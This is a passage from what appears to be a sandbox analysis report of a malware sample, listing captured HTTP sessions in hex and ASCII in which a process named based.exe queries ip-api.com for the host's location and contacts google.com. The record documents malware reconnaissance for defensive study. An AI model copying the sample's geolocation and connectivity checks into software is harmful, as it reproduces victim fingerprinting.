                                                                                        Data Ascii: 2E5bWpbQZU>/8k","IMe~Q:j.3OR={;s"VrG,SP 2f~&cSwn=>%_OTq@r_;FH_S/]Y-3ow>ib&%'"5BRKW(uT"(/z;e.i
                                                                                        Jun 5, 2024 03:56:41.030848026 CEST424INData Raw: b9 f5 5d fe 3e 86 cb 9e 6b f7 02 93 40 b2 36 39 bc e4 c1 61 a2 25 b7 77 53 d8 e0 ae fd e6 e4 f7 93 93 9f 36 b0 83 27 8f cd 69 b7 74 0a b0 79 ae 29 22 b8 32 fe 0c 42 26 37 4a 10 f9 e9 72 0a 3c 60 63 e0 ba 05 b0 2d 30 d7 41 a0 0a 83 14 cc 16 5e 65
                                                                                        Data Ascii: ]>k@69a%wS6'ity)"2B&7Jr<`c-0A^ePd((,.o@Eb#K{RWwRtu7GyU&k`J%(ZSE|AD4RAab_z\CVFA>(C;DVe/9k)DS*-lxH>
                                                                                        Jun 5, 2024 03:56:41.030863047 CEST726INData Raw: 1a c9 ba fd fc 6f 4f 4a cb 23 4b 97 be 77 65 56 0a f7 22 54 5e 73 1e 50 48 f8 7e e9 5e af 6a 58 bc 7b 82 c5 3f 73 ea 30 ef 8b 7c de 17 35 27 89 17 c1 ce cb d5 3b af e9 7b 1a 5c 38 91 65 df f4 e1 c8 03 a3 1c 41 8b 96 70 91 fa d7 1e 44 95 3b e7 ee
                                                                                        Data Ascii: oOJ#KweV"T^sPH~^jX{?s0|5';{\8eApD;5'l gvESZONMexc/{1ynNK4zFW~=<y-.8+1y6%\X\~@ZX5{a[i+iMu*|C)iW|vFSXlR
                                                                                        Jun 5, 2024 03:56:41.030884027 CEST1236INData Raw: ec 63 a8 11 73 53 56 37 2f cb 79 29 a9 d0 a4 a3 5a 4a 3d ed d9 15 85 2d 41 d5 e3 a3 b3 51 29 a9 d6 8a fb 47 b2 45 9f da 22 f1 85 a5 ac b6 e5 e0 22 dd da c8 f3 ad 70 e4 6c 75 9f ed ab 78 9a 53 aa 6d 3f bf 9a 54 65 60 75 d4 ab fa b5 7d 71 a9 07 f6
                                                                                        Data Ascii: csSV7/y)ZJ=-AQ)GE""pluxSm?Te`u}qkW<W$nFuv(E6wu}wyJ)1+?6~pX=t/(/Z<jG7I]c~,>sZ[|NvO//sW
                                                                                        Jun 5, 2024 03:56:41.030900002 CEST212INData Raw: 6f bb ee b2 b2 6c 0a 73 d9 30 1b 8d ac f9 8d 2e 53 7c 13 1b c2 4e 58 81 9f b6 c1 59 7b 39 e1 ad ab d7 57 5f 53 ba 02 bf 14 32 3c a1 db c0 25 13 4f 21 98 93 c7 c7 26 96 96 8e 16 43 5b 3f db 9d c7 28 a2 9e dd fa f2 b7 f4 ab ae 52 8b 52 a7 84 1d dc
                                                                                        Data Ascii: ols0.S|NXY{9W_S2<%O!&C[?(RRk21g)JJ;>[2T:\6;q(s)mt!)m{Fy)9|lmQ0?]o~OSP:E>jTx
                                                                                        Jun 5, 2024 03:56:41.030905962 CEST1236INData Raw: 82 a4 5c 95 74 a1 f3 1e 57 8a ad 94 8f 8f 8f ca 43 79 95 e4 ea d5 32 5c 9c dd bb 5c bc ed 0d b0 ab a7 55 a5 32 89 0c 35 5d ca e2 93 6a 80 b4 36 76 9a 0f 7e 95 fe f5 c0 e5 00 37 f5 11 6e ca 21 6e fe ce 18 db 3e 70 66 5f 98 fa 50 37 c4 3f ab 6f 51
                                                                                        Data Ascii: \tWCy2\\U25]j6v~7n!n>pf_P7?oQ2=7{FW&Z`7d;)CoWv;1CkY71[FU :AX2L\"< 8MHk@|W[iBBoSY~1i?-Zo
                                                                                        Jun 5, 2024 03:56:41.031260014 CEST396INData Raw: ed 7b 4b a7 51 ef ec 4d 93 f8 83 4c 39 b1 e2 f5 4a b9 97 40 b2 e2 af 41 45 6e fe ca bb 78 1f 5e ff b7 3d a5 34 8e cb e8 f4 ee ad 0c bb bc 7a 6a f1 24 49 d8 2a 3f 4d 0b ed 5d 77 01 0a cd 95 df 2d 3f 83 3a c0 38 36 1a de c5 56 95 88 9d 42 cd b3 43
                                                                                        Data Ascii: {KQML9J@AEnx^=4zj$I*?M]w-?:86VBCA$Z<YKx)wnvFc^e-'LgMuOG'[lYT=:v(R"5:4x>%uvfOIoAS9


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        2192.168.2.449750208.95.112.180
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jun 5, 2024 03:56:42.013809919 CEST65OUTGET /json/ HTTP/1.1
                                                                                        Host: ip-api.com
                                                                                        Connection: Keep-Alive
                                                                                        Jun 5, 2024 03:56:42.602694988 CEST468INHTTP/1.1 200 OK
                                                                                        Date: Wed, 05 Jun 2024 01:56:41 GMT
                                                                                        Content-Type: application/json; charset=utf-8
                                                                                        Content-Length: 291
                                                                                        Access-Control-Allow-Origin: *
                                                                                        X-Ttl: 45
                                                                                        X-Rl: 43
                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 58 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 7a 69 70 22 3a 22 37 36 35 34 39 22 2c 22 6c 61 74 22 3a 33 31 2e 30 30 36 35 2c 22 6c 6f 6e 22 3a 2d 39 37 2e 38 34 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 51 75 61 64 72 61 4e 65 74 22 2c 22 6f 72 67 22 3a 22 4f 4d 47 49 54 53 46 41 53 54 22 2c 22 61 73 22 3a 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 7d
                                                                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.91"}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449752208.95.112.1807840C:\ProgramData\Microsoft\based.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jun 5, 2024 03:56:42.581944942 CEST116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                        Host: ip-api.com
                                                                                        Accept-Encoding: identity
                                                                                        User-Agent: python-urllib3/2.2.1
                                                                                        Jun 5, 2024 03:56:43.200323105 CEST375INHTTP/1.1 200 OK
                                                                                        Date: Wed, 05 Jun 2024 01:56:42 GMT
                                                                                        Content-Type: application/json; charset=utf-8
                                                                                        Content-Length: 198
                                                                                        Access-Control-Allow-Origin: *
                                                                                        X-Ttl: 44
                                                                                        X-Rl: 42
                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 72 65 76 65 72 73 65 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 2e 73 74 61 74 69 63 2e 71 75 61 64 72 61 6e 65 74 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 7d
                                                                                        Data Ascii: {"status":"success","country":"United States","regionName":"Texas","timezone":"America/Chicago","reverse":"173.254.250.91.static.quadranet.com","mobile":false,"proxy":false,"query":"173.254.250.91"}


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        4192.168.2.449757216.58.212.13280
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jun 5, 2024 03:56:49.629136086 CEST149OUTGET / HTTP/1.1
                                                                                        Host: www.google.com
                                                                                        User-Agent: python-requests/2.28.1
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept: */*
                                                                                        Connection: keep-alive
                                                                                        Jun 5, 2024 03:56:50.806344032 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 05 Jun 2024 01:56:50 GMT
                                                                                        Expires: -1
                                                                                        Cache-Control: private, max-age=0
                                                                                        Content-Type: text/html; charset=ISO-8859-1
                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-An7JMPqZmmjywSuMTUczRw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Content-Encoding: gzip
                                                                                        Server: gws
                                                                                        Content-Length: 8484
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Set-Cookie: 1P_JAR=2024-06-05-01; expires=Fri, 05-Jul-2024 01:56:50 GMT; path=/; domain=.google.com; Secure
                                                                                        Set-Cookie: AEC=AQTF6HzDL0BjW3Zk2wmBbdU3MXAt8fPxQQ_WnQ8i5rULsv9QOgDG3Z4FQg; expires=Mon, 02-Dec-2024 01:56:50 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                        Set-Cookie: NID=514=R5bSnjClrfCueKu9bBCrQU33sXXP7jjcqJXzSJxURWqdaL2SrYCiBQ6QVuVhx1R_rSRrRove5W9Ea1vEKV1XsDKi_sc9RelRnnT_sBssk2RlIy-C-OOJEfWykK7Szx6S7gJMeJDEy3KzSKkkt97Qr70E2jNK-vvRR8-omBVKiaA; expires=Thu, 05-Dec-2024 01:56:50 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 7c 7b 7b db b6 d2 e7 ff f9 14 34 b3 47 11 1f d3 12 49 dd 25 d3 5e c7 71 2e 3d 49 93 c6 69 4f 5b d7 eb 17 24 21 89 31 2f 32 49 d9 56 6c 7d f7 fd 0d c0 9b 64 a5 ed db dd 67 9f 4d 1b 9b 04 06 83 b9 61 30 33 00 73 b8 e7 c5 6e b6 5a 70 65 9e 85 c1 d1 21 fd 54 fc 8c 87 a9 1b 2f b8 ad aa e2 85 00 6c 75
                                                                                        Data Ascii: |{{4GI%^q.=IiO[$!1/2IVl}dgMa03snZpe!T/lu
                                                                                        Jun 5, 2024 03:56:50.806404114 CEST212INData Raw: 9e 65 8b 71 bb 9d ba 73 1e b2 56 9c cc da ff e1 ce 27 36 e3 aa 12 b0 68 66 ab 3c 52 81 81 33 ef e8 30 e4 19 53 dc 38 ca 78 94 d9 ea 39 67 89 3b 57 b2 39 57 ee e2 24 f0 5e a4 8a 1f 4d e3 24 64 99 1f 47 3a 5e dc 60 e9 f9 d1 4c b9 e3 ce 02 18 53 b4
                                                                                        Data Ascii: eqsV'6hf<R30S8x9g;W9W$^M$dG:^`LS8UX)a&geh,PeJ+s,UT>{fJZ_$\&-UX= m8R&ggmDq,IyfPUHxf
                                                                                        Jun 5, 2024 03:56:50.806441069 CEST1236INData Raw: da ea a9 04 3f f8 02 b1 3e 41 d1 96 8c b7 9d 04 2c 83 c2 f6 4c f0 3b 6b 9b f7 c5 e3 55 9a a1 8f 25 de 95 1b 07 71 72 65 5a 43 6f d1 5a 44 33 a9 ad 45 12 2f 6c 55 a0 01 f6 cc cf 02 7e 24 85 76 d8 96 6f 87 92 4f 25 8a 23 17 cc 9c 44 83 1f 3e 7c ba
                                                                                        Data Ascii: ?>A,L;kU%qreZCoZD3E/lU~$voO%#D>|=~|5%i4[(W3E7eF}f'~~CzF39n>gav,;#>;]wLcNQ-tzgn;FQz
                                                                                        Jun 5, 2024 03:56:50.806477070 CEST1236INData Raw: 34 86 ae 05 4b 10 4e fc 18 7b 7c 92 f3 e3 3c 3e 86 eb 72 92 9b 8d 49 6c a2 e6 ef cf 14 fc d5 54 d5 3c 09 cd d3 fe 5f 32 76 f4 5b 19 4f 33 b4 34 1a 22 9a 4c c7 aa 5d ca 2b 88 5d 11 0e b6 10 bf 64 31 22 1b 50 93 0b 2c c4 73 f9 d8 3c 4b 12 d0 ad 32
                                                                                        Data Ascii: 4KN{|<>rIlT<_2v[O34"L]+]d1"P,s<K2UL!M1gA3ZA[?+)_Kvr`6o Nhz`}~1`092p5*,Sa27/oewM}4kjd F!Tk0{
                                                                                        Jun 5, 2024 03:56:50.806509018 CEST1236INData Raw: 30 95 74 ea eb 02 84 46 8e 4d a2 f8 09 df 04 95 e6 00 83 9d 00 5e fa e0 f9 e9 22 60 ab b1 1f 09 8e 9c f8 7e b2 dd 84 a8 f4 3a b7 26 21 1e 43 e9 56 e6 45 46 33 c6 fb da 8f 16 cb 6c 43 11 7e 34 c7 34 99 94 bf c3 dc eb 59 12 c3 82 c6 cf a7 d3 e9 a4
                                                                                        Data Ascii: 0tFM^"`~:&!CVEF3lC~44YcmRxNa5%t69:P=/G!X$_-fq6NGS6a,= bi0|`zV":F9GF.-i$.Y^#v{0,U5
                                                                                        Jun 5, 2024 03:56:50.806545019 CEST1236INData Raw: 83 4d f5 e8 b7 78 f9 05 8d 7f 35 1e 1a de e0 44 8e 8f d4 a3 1f d1 f1 57 83 43 e6 07 9b 62 f0 83 1c 43 a8 1e bd a1 d7 bf 42 e1 25 08 c3 9e 12 10 ab 47 af a8 e7 e9 70 11 84 c9 1b 02 db f1 bd fa 17 da 8e b2 a0 cd a3 36 73 20 af f6 22 89 bd a5 9b a5
                                                                                        Data Ascii: Mx5DWCbCB%Gp6s "r9,ly!N0Hi$fOh46BJMC.X$4*I1wmlB/2p$G-1wr|$I?O<YVdB-[f50s.#d{IY^0
                                                                                        Jun 5, 2024 03:56:50.806577921 CEST1236INData Raw: 45 59 0b 47 54 e2 c6 8b d5 44 b1 0c ab ab 1c 28 4f a7 5b c4 70 bb 48 72 11 28 fb b7 cc 5d 81 d2 4f f2 49 04 c5 7f 3a 04 f2 09 89 b5 2f f4 5b d2 b7 a8 bc 58 11 5a fe 9f d6 91 5d 2f b6 8b d3 1d f0 a4 e7 47 7a dd ae b1 e3 16 59 51 6e f3 a3 88 27 ff
                                                                                        Data Ascii: EYGTD(O[pHr(]OI:/[XZ]/GzYQn'!Hh{+&Ih:)TdT*u)PvnB^ZTTThQ-h\k#OmQRV(6z+9[g*Tj&UX~m_\Z~(h47Onuq
                                                                                        Jun 5, 2024 03:56:50.806615114 CEST138INData Raw: 2d 40 36 a5 b2 01 61 94 3c 02 fb 32 cd 43 ec 49 d2 74 f4 4a 45 74 47 c4 3e 30 2b 69 30 7b cf a8 2d 37 fa f0 21 5f 34 db f7 40 bf 8a ac 99 2e e4 21 43 2d 16 6f 53 fd f9 e5 af 6f df a9 f9 e9 f3 e7 ce 74 7e ed 14 6f 5f ce 7f 3f bb f1 c4 9b 70 3a 73
                                                                                        Data Ascii: -@6a<2CItJEtG>0+i0{-7!_4@.!C-oSot~o_?p:s>.b]uTpjm+W{I7r"O
                                                                                        Jun 5, 2024 03:56:50.806742907 CEST1236INData Raw: 76 dd 65 65 d9 14 ee b2 61 36 1a 59 f3 1b 5d a6 f8 26 36 84 9d b0 82 3e 6d 43 b2 f6 72 c2 5b 57 af af be a6 74 05 7e 29 74 78 42 b7 81 4b 21 9e 42 31 27 8f 8f 4d 2c 2d 1d 3d 86 b6 7e b6 bb 8e 51 64 3d bb ed e5 6f d9 57 dd a4 16 a5 4d 09 3f b8 d7
                                                                                        Data Ascii: veea6Y]&6>mCr[Wt~)txBK!B1'M,-=~Qd=oWM?d6r"cS6*]s/6?3p4odR}cs8TJ^&g(v\wnJV5Vuw147n>-At[97II*B#[)*e8w`
                                                                                        Jun 5, 2024 03:56:50.806778908 CEST608INData Raw: 4d b2 8b 93 4b e4 b2 e3 cd d6 f2 70 02 a9 d1 31 fe da ce 58 1e 9e b6 64 01 82 be f8 a3 23 39 9e 02 fe 61 36 7e 90 0e c5 d1 91 38 4d fd d9 32 a1 93 6d fa 84 e0 2e f1 b3 e2 99 47 08 41 f3 1e 73 8d 4c 55 6b be d4 7b 3d 6d 92 a3 9e 26 9c 7f e3 c8 68
                                                                                        Data Ascii: MKp1Xd#9a6~8M2m.GAsLUk{=m&h&8;j7}p]*C~S0(0=/h\vn '(ehGbYZ_vK=aVIZ[:zgodWT


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        5192.168.2.449766208.95.112.180
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jun 5, 2024 03:56:57.538047075 CEST65OUTGET /json/ HTTP/1.1
                                                                                        Host: ip-api.com
                                                                                        Connection: Keep-Alive
                                                                                        Jun 5, 2024 03:56:58.126766920 CEST468INHTTP/1.1 200 OK
                                                                                        Date: Wed, 05 Jun 2024 01:56:57 GMT
                                                                                        Content-Type: application/json; charset=utf-8
                                                                                        Content-Length: 291
                                                                                        Access-Control-Allow-Origin: *
                                                                                        X-Ttl: 60
                                                                                        X-Rl: 44
                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 58 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 7a 69 70 22 3a 22 37 36 35 34 39 22 2c 22 6c 61 74 22 3a 33 31 2e 30 30 36 35 2c 22 6c 6f 6e 22 3a 2d 39 37 2e 38 34 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 51 75 61 64 72 61 4e 65 74 22 2c 22 6f 72 67 22 3a 22 4f 4d 47 49 54 53 46 41 53 54 22 2c 22 61 73 22 3a 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 7d
                                                                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.91"}


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        6192.168.2.449775216.58.212.13280
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jun 5, 2024 03:57:06.678442955 CEST149OUTGET / HTTP/1.1
                                                                                        Host: www.google.com
                                                                                        User-Agent: python-requests/2.28.1
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept: */*
                                                                                        Connection: keep-alive
                                                                                        Jun 5, 2024 03:57:07.569123030 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 05 Jun 2024 01:57:07 GMT
                                                                                        Expires: -1
                                                                                        Cache-Control: private, max-age=0
                                                                                        Content-Type: text/html; charset=ISO-8859-1
                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-b41Ni5nQpr_ukMwRTjeo6g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Content-Encoding: gzip
                                                                                        Server: gws
                                                                                        Content-Length: 8452
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Set-Cookie: AEC=AQTF6HzwyDnnBZT3MJtaoyp0VqWUKf8HmHAKViz_1V-lJV09jizrkLvTcJc; expires=Mon, 02-Dec-2024 01:57:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                        Set-Cookie: NID=514=ZKVoyvXbDOkf_5MfAkgWqLQfedWI8bq4aK17jtJLDoFm3vZ0KRFwixFpemSL8gbUXVuvQYfVm1osSoyvy45AkkQhmZVEQ1OdyguLCxESezCWnQhNbtdlgzlWT5ZRVGREMKLnuTF5SHqSe1yCC0n1Yp149vsh8H1JXBY5yFEZUAQ; expires=Thu, 05-Dec-2024 01:57:07 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 7c 79 7b db 36 b3 ef ff f9 14 34 7b 5e 45 7c 4c 4b a4 f6 c5 b4 af e3 38 4b 4f b6 c6 e9 f2 d6 f5 f5 01 49 48 62 cc cd 24 65 5b b1 f5 dd ef 6f 00 6e 92 95 b6 a7 e7 3e f7 b9 69 63 93 c0 00 98 0d 83 99 c1 30 87 7b 6e e4 64 ab 98 2b 8b 2c f0 8f 0e e9 a7 e2 65 3c 48 9d 28 e6 96 aa 8a 17 02 b0 d4 45 96 c5 93 76 3b 75 16 3c 60 ad 28 99 b7 7f e5 f6 27 36 e7 aa e2 b3 70 6e a9 3c 54 31 03 67 ee d1 61 c0 33 a6 38 51 98 f1 30 b3 d4 73 ce 12 67 a1 64 0b ae dc 45 89 ef 3e 4f 15 2f 9c 45 49 c0 32 2f 0a 75 bc 38 fe d2 f5 c2 b9 72 c7 ed 18 33 a6 68 0b e4 ef 5b cf e5 51 aa b0 d0 55 82 28 e1 2d e5 75 14 cd 7d e0 cb 52 25 60 e1 4a 49
                                                                                        Data Ascii: |y{64{^E|LK8KOIHb$e[on>ic0{nd+,e<H(Ev;u<`('6pn<T1ga38Q0sgdE>O/EI2/u8r3h[QU(-u}R%`JI
                                                                                        Jun 5, 2024 03:57:07.569186926 CEST1236INData Raw: 63 ee 78 cc 57 66 9c 65 cb 84 a7 4a 16 29 0b ee c7 ca 2a 5a 2a 33 0f e3 f8 3d 73 32 7f a5 dc 2d 58 46 ad cf 13 ae f8 51 74 4d 0b 02 8b 96 aa 84 2c 00 81 2e 4f 9d c4 8b 09 27 75 9b 84 30 8a dc 58 57 0a d0 24 b2 a3 2c 7d 02 95 f1 fb ac 4d 3c 9c 2a
                                                                                        Data Ascii: cxWfeJ)*Z*3=s2-XFQtM,.O'u0XW$,}M<*%):1,[K=_'S%m;=}xfc{D~\p.'Qlby$PQg~Oqr~WQsFS{er5NF~az'v~
                                                                                        Jun 5, 2024 03:57:07.569195032 CEST1236INData Raw: 09 87 53 10 2a b7 91 e7 2a c6 9e b5 89 7d a3 b1 bb bd 45 ec 68 34 76 b7 1f 3f 6d 9a 10 73 d6 53 c2 24 d0 43 eb e2 b2 c2 21 6e 32 ed 01 4e 46 93 3a ed 29 6b 34 9a 7b ac 35 e7 d9 49 96 25 9e bd cc f8 e3 e3 5e d3 b6 36 db 9a 2a f7 5c 55 d3 b4 a9 c6
                                                                                        Data Ascii: S**}Eh4v?msS$C!n2NF:)k4{5I%^6*\U1Xl,b6%Ihxa:Q_~g$aYogiL>`b5DYm]Zj(TM=KzMtj6_}+oG
                                                                                        Jun 5, 2024 03:57:07.569427967 CEST636INData Raw: 3c 9a 17 12 9e 40 45 94 11 fe 1a eb cc 7d 20 52 0f 72 9e b6 46 3c 00 9a cc b9 0a 94 ad 2e 13 fa b0 a6 c4 5c be 4a a1 26 1d 83 c4 ba 28 48 32 c7 83 a1 db 59 f3 40 a2 7b 27 07 db 91 ef e6 9a 40 94 4d 42 4a f0 f9 eb 96 9f 66 a5 38 fb a5 d4 7b e3 81
                                                                                        Data Ascii: <@E} RrF<.\J&(H2Y@{'@MBJf8{PtFNLnziEvt?nWzk`*"}2.L&o3zDlZjf#ep)l l`nusb:zP\kJmy>Z1GtRb7
                                                                                        Jun 5, 2024 03:57:07.569436073 CEST1236INData Raw: fe a2 6d f1 d0 41 04 ff f3 e7 b7 a7 11 0e 9e 90 7c 1b e9 e3 a9 ed 3c 96 2b e2 38 11 e3 da 05 2b 10 ac 95 ae a7 c8 e5 83 b7 0e 45 8a 5f f9 7d 4c 71 6e 1d 14 dd 08 aa 44 37 a2 9e 78 5e ef 4d 43 8a 09 21 6a d1 28 84 ae ed 3f 53 1b 36 b6 42 de 64 df
                                                                                        Data Ascii: mA|<+8+E_}LqnD7x^MC!j(?S6Bdj$l2#3+NM<RcB`KymW%IMr0j]7_k*yUbv)QZpS z0!hDRFwYSiY*^
                                                                                        Jun 5, 2024 03:57:07.569446087 CEST1163INData Raw: 32 c0 34 4f c3 db 5a 44 ad 2a 6c 49 37 80 41 4c f7 24 96 1a c1 09 29 c8 04 ca 54 8f 54 e8 ab 72 9e 4b 3f 60 f7 d2 cf 84 f0 8c de a8 e0 e8 0d 10 f2 be e1 a1 3f 54 0b f5 c1 d6 c8 91 ac e7 b1 88 1a 61 ca 2a fa 37 1b 28 e1 f0 94 62 bb c4 6c 0b a1 9c
                                                                                        Data Ascii: 24OZD*lI7AL$)TTrK?`?Ta*7(blYr[/d~K2+{(8)$|tW5,>9uXy`\.opQE[HkYpgN7zsmz)t''rL2<F=>qz7v'wvd
                                                                                        Jun 5, 2024 03:57:07.569689035 CEST1236INData Raw: 9d fb ed f5 e9 ea c7 9b 17 f1 d9 e7 fb cf 2f 0e 06 8b b3 57 73 89 ec d7 f4 6f cb 29 47 f5 4f fe ec 10 44 f5 07 82 78 fa 67 5b 10 39 e7 37 68 f8 f5 f5 6f 3f f5 3e ae 5e fe f4 d2 ff f4 db c2 7b 1b 66 c3 5f 7e 5c 9d 67 ef 1d d0 c0 ef 9d 60 72 71 b9
                                                                                        Data Ascii: /Wso)GODxg[97ho?>^{f_~\g`rq*pk]AX7ZOhVj_-JB78KO-+.5df9dn<,S<\!^nt3yT8Dq: |(UUyMefUu/Kd5]YP!xf
                                                                                        Jun 5, 2024 03:57:07.569832087 CEST1236INData Raw: f1 67 44 9f 34 0e 8c d1 78 a4 9b 7d a3 77 59 52 f2 ea 2a 8b e6 10 44 9d 20 6c 99 5a 6b 26 c5 52 ee 62 0c 11 1e a2 ef 9f a6 69 d3 c1 81 f8 6c 47 24 fe d5 47 20 3e f3 27 86 ee de 4d 84 df ab 53 55 a3 7c 5a da 41 f1 74 17 8b 2a 44 fd 36 95 2d eb a7
                                                                                        Data Ascii: gD4x}wYR*D lZk&RbilG$G >'MSU|ZAt*D6-?qce799=:;DF4?EL]nxOKfo,O.QoyZa`p~!UJ8<8'%\J4xuT5aPewC_A_N
                                                                                        Jun 5, 2024 03:57:07.569839954 CEST255INData Raw: da 99 4c a0 04 79 61 cc d4 b5 ce d6 6f ac ff 94 18 cd 74 57 47 8c 27 be 15 a1 0f 5b ea 9c a0 6c 59 ed 03 54 06 d1 be d5 e4 99 d0 3b b4 de 14 f8 da 56 ff a8 f9 e6 a2 78 3f 30 2f 0f 6a 6f 3d 88 d4 3c eb d2 fc e2 93 f3 fa 37 f8 94 d4 d9 99 65 10 da
                                                                                        Data Ascii: LyaotWG'[lYT;Vx?0/jo=<7ez<&LzZB/`N}5GA_S*M#c"W"|eWb<;)AMJWhfy)/[;B~}z65@'?}:Re?


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        7192.168.2.449785208.95.112.180
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jun 5, 2024 03:57:14.647624969 CEST65OUTGET /json/ HTTP/1.1
                                                                                        Host: ip-api.com
                                                                                        Connection: Keep-Alive
                                                                                        Jun 5, 2024 03:57:15.237062931 CEST468INHTTP/1.1 200 OK
                                                                                        Date: Wed, 05 Jun 2024 01:57:14 GMT
                                                                                        Content-Type: application/json; charset=utf-8
                                                                                        Content-Length: 291
                                                                                        Access-Control-Allow-Origin: *
                                                                                        X-Ttl: 42
                                                                                        X-Rl: 43
